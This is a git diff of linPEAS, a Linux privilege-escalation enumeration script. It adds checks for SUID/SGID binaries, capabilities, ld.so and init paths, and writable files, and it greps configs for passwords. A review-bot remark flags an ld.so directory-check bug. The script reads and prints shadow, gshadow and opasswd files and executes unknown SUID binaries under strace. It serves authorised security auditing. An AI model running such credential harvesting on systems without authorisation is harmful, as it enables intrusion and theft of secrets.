"($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} 
"s,$pwd_in_variables11,${SED_RED},g" & - else - timeout 150 find $SEARCH_IN_FOLDER -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & - fi - wait - echo "" - - ##-- IF) Find possible conf files with passwords - print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)" - if ! 
[ "$SEARCH_IN_FOLDER" ]; then - ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) - else - ppicf=$(timeout 150 find $SEARCH_IN_FOLDER -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) - fi - printf "%s\n" "$ppicf" | while read f; do - if grep -qEiI 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' \"$f\" 2>/dev/null; then - echo "$ITALIC $f$NC" - grep -HnEiIo 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" - fi - done - echo "" -fi diff --git a/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh b/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh new file mode 100644 index 0000000..8180486 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh 
@@ -0,0 +1,491 @@ +########################################### +#-) Files with Interesting Permissions (-# +########################################### + +check_critial_root_path(){ + folder_path="$1" + if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi +} + + + + +##-- IPF) SUID +print_2title "SUID - Check easy privesc, exploits and write perms" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" +if ! [ "$STRINGS" ]; then + echo_not_found "strings" +fi +if ! [ "$STRACE" ]; then + echo_not_found "strace" +fi +suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $suids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total"; then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! 
[ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo $s | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ]; then + + if [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + fi + fi + done + fi + + if [ "$LDD" ] || [ "$READELF" ]; then + echo "$ITALIC --- Checking for writable 
dependencies of $sname...$NC" + fi + if [ "$LDD" ]; then + "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + fi + if [ "$READELF" ]; then + "$READELF" -d "$sname" | grep PATH | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + fi + + if [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH + export LD_LIBRARY_PATH="" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH + echo "----------------------------------------------------------------------------------------" + echo "" + fi + + fi + fi + fi + fi +done; +echo "" + + +##-- IPF) SGID +print_2title "SGID" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" +sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $sgids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total";then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! 
[ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ]; then + + if [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + fi + fi + fi + done + fi + + if [ "$LDD" ] || [ "$READELF" ]; then + echo "$ITALIC --- Checking for writable dependencies of $sname...$NC" + fi + if [ "$LDD" ]; then + "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E} 
"s,$Wfolders,${SED_RED_YELLOW},g" + fi + if [ "$READELF" ]; then + "$READELF" -d "$sname" | grep PATH | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + fi + + if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf "$ITALIC" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf "$NC" + echo "" + fi + + fi + fi + fi + fi +done; +echo "" + +##-- IPF) Misconfigured ld.so +if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then + print_2title "Checking misconfigurations of ld.so" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so" + if [ -f "/etc/ld.so.conf" ] && [ -w "/etc/ld.so.conf" ]; then + echo "You have write privileges over /etc/ld.so.conf" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED$ITALIC"/etc/ld.so.conf\n"$NC; + else + printf $GREEN$ITALIC"/etc/ld.so.conf\n"$NC; + fi + + echo "Content of /etc/ld.so.conf:" + cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + + # Check each configured folder + cat /etc/ld.so.conf 2>/dev/null | while read l; do + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + + if [ -d "/etc/ld.so.conf" ] && [ -w "$fpath" ]; then + echo "You have write privileges over $fpath" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED_YELLOW$ITALIC"$fpath\n"$NC; + else + printf $GREEN$ITALIC"$fpath\n"$NC; + fi + + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then + echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + + for f in $fpath/*; do + if 
[ -w "$f" ]; then + echo "You have write privileges over $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED_YELLOW$ITALIC"$f\n"$NC; + else + printf $GREEN$ITALIC" $f\n"$NC; + fi + + cat "$f" | grep -v "^#" | while read l2; do + if [ -f "$l2" ] && [ -w "$l2" ]; then + echo "You have write privileges over $l2" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED_YELLOW$ITALIC" - $l2\n"$NC; + else + echo $ITALIC" - $l2"$NC | sed -${E} "s,$l2,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"; + fi + done + done + fi + done + echo "" + + + if [ -f "/etc/ld.so.preload" ] && [ -w "/etc/ld.so.preload" ]; then + echo "You have write privileges over /etc/ld.so.preload" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + else + printf $ITALIC$GREEN"/etc/ld.so.preload\n"$NC; + fi + cat /etc/ld.so.preload 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat /etc/ld.so.preload 2>/dev/null | while read l; do + if [ -f "$l" ] && [ -w "$l" ]; then echo "You have write privileges over $l" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + done + +fi + +##-- IPF) Capabilities +if ! 
[ "$SEARCH_IN_FOLDER" ]; then + print_2title "Capabilities" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities" + if [ "$(command -v capsh)" ]; then + + print_3title "Current shell capabilities" + cat "/proc/$$/status" | grep Cap | while read -r cap_line; do + cap_name=$(echo "$cap_line" | awk '{print $1}') + cap_value=$(echo "$cap_line" | awk '{print $2}') + if [ "$cap_name" = "CapEff:" ]; then + echo "$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED_YELLOW},")" + else + echo "$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED},")" + fi + done + echo "" + + print_3title "Parent process capabilities" + cat "/proc/$PPID/status" | grep Cap | while read -r cap_line; do + cap_name=$(echo "$cap_line" | awk '{print $1}') + cap_value=$(echo "$cap_line" | awk '{print $2}') + if [ "$cap_name" = "CapEff:" ]; then + echo "$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED_YELLOW},")" + else + echo "$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED},")" + fi + done + echo "" + + else + print_3title "Current shell capabilities" + (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" + echo "" + + print_3title "Parent proc capabilities" + (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" + echo "" + fi + echo "" + echo "Files with capabilities (limited to 50):" + getcap -r / 2>/dev/null | head -n 50 | while read cb; do + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break + fi + done + + if 
! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," + fi + + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi + done + echo "" +fi + +##-- IPF) Users with capabilities +if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then + print_2title "Users with capabilities" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities" + if [ -f "/etc/security/capability.conf" ]; then + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + else echo_not_found "/etc/security/capability.conf" + fi + echo "" +fi + +##-- IPF) AppArmor profiles to prevent suid/capabilities abuse +if ! [ "$SEARCH_IN_FOLDER" ]; then + if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then + print_2title "AppArmor binary profiles" + ls -l /etc/apparmor.d/ 2>/dev/null | grep -E "^-" | grep "\." + echo "" + fi +fi + +##-- IPF) Files with ACLs +print_2title "Files with ACLs (limited to 50)" +print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls" +if ! [ "$SEARCH_IN_FOLDER" ]; then + ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +else + ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi + +if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! 
[ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi +echo "" + +##-- IPF) Files with ResourceFork +#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER +# print_2title "Files with ResourceFork" +# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" +# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" +#fi +#echo "" + +##-- IPF) Files (scripts) in /etc/profile.d/ +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Files (scripts) in /etc/profile.d/" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files" + if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + check_critial_root_path "/etc/profile" + check_critial_root_path "/etc/profile.d/" + fi + echo "" +fi + + ##-- IPF) Files (scripts) in /etc/init.d/ + if ! [ "$SEARCH_IN_FOLDER" ]; then +print_2title "Permissions in init, init.d, systemd, and rc.d" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d" + if [ ! "$MACPEAS" ] && ! 
[ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + check_critial_root_path "/etc/init/" + check_critial_root_path "/etc/init.d/" + check_critial_root_path "/etc/rc.d/init.d" + check_critial_root_path "/usr/local/etc/rc.d" + check_critial_root_path "/etc/rc.d" + check_critial_root_path "/etc/systemd/" + check_critial_root_path "/lib/systemd/" + fi + + echo "" +fi + + + +##-- IPF) Hashes in passwd file +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_list "Hashes inside passwd file? ........... " + if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + ##-- IPF) Writable in passwd file + print_list "Writable passwd file? ................ " + if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else echo_no + fi + + ##-- IPF) Credentials in fstab + print_list "Credentials in fstab/mtab? ........... " + if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + ##-- IPF) Read shadow files + print_list "Can I read shadow files? ............. " + if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "Can I read shadow plists? ............ 
" + possible_check="" + (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + + print_list "Can I write shadow plists? ........... " + possible_check="" + (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + + ##-- IPF) Read opasswd file + print_list "Can I read opasswd file? ............. " + if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" + else echo_no + fi + + ##-- IPF) network-scripts + print_list "Can I write in network-scripts? ...... " + if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," + elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else echo_no + fi + + ##-- IPF) Read root dir + print_list "Can I read root folder? .............. " + (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no + echo "" +fi + +##-- IPF) Root files in home dirs +if ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Searching root files in home dirs (limit 30)" + (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found + echo "" +fi + +##-- IPF) Others files in my dirs +if ! 
[ "$IAMROOT" ]; then + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec ls -l {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" + echo "" +fi + +##-- IPF) Readable files belonging to root and not world readable +if ! [ "$IAMROOT" ]; then + print_2title "Readable files belonging to root and readable by me but not world readable" + (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found + echo "" +fi + +##-- IPF) Interesting writable files by ownership or all +if ! [ "$IAMROOT" ]; then + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" + #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! 
-path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$obmowbe" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -qE "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + echo "" +fi + +##-- IPF) Interesting writable files by group +if ! [ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" + for g in $(groups); do + iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + if [ "$iwfbg" ] || [ "$DEBUG" ]; then + printf " Group $GREEN$g:\n$NC"; + printf "%s\n" "$iwfbg" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -Eq "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + fi + done + echo "" +fi \ No newline at end of file 
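Review bot: In the "Checking misconfigurations of ld.so" section the directory test `if [ -d "/etc/ld.so.conf" ] && [ -w "$fpath" ]` can never be true, because /etc/ld.so.conf is a regular file, so a writable include directory such as /etc/ld.so.conf.d is always printed in green as safe. The checks that follow only look at files already inside that directory, so an empty but writable ld.so.conf.d (the textbook ld.so privesc) is silently missed. The intended test is presumably on the derived path: `if [ -d "$fpath" ] && [ -w "$fpath" ]; then`. Separately, the SGID loop runs `timeout 2 "$STRACE" "$sname"` without the `NOTEXPORT` guard and the LD_LIBRARY_PATH save/clear/restore that the SUID loop uses a few lines earlier; if that asymmetry is intentional it deserves a comment, since both branches execute unknown privileged binaries on the target.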
diff --git a/linPEAS/builder/linpeas_parts/9_api_keys_regex.sh b/linPEAS/builder/linpeas_parts/9_api_keys_regex.sh
deleted file mode 100644
index cb3ec34..0000000
--- a/linPEAS/builder/linpeas_parts/9_api_keys_regex.sh
+++ /dev/null
@@ -1,6 +0,0 @@
-
-if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then
- peass{REGEXES}
-else
- echo "Regexes to search for API keys aren't activated, use param '-r' "
-fi
\ No newline at end of file
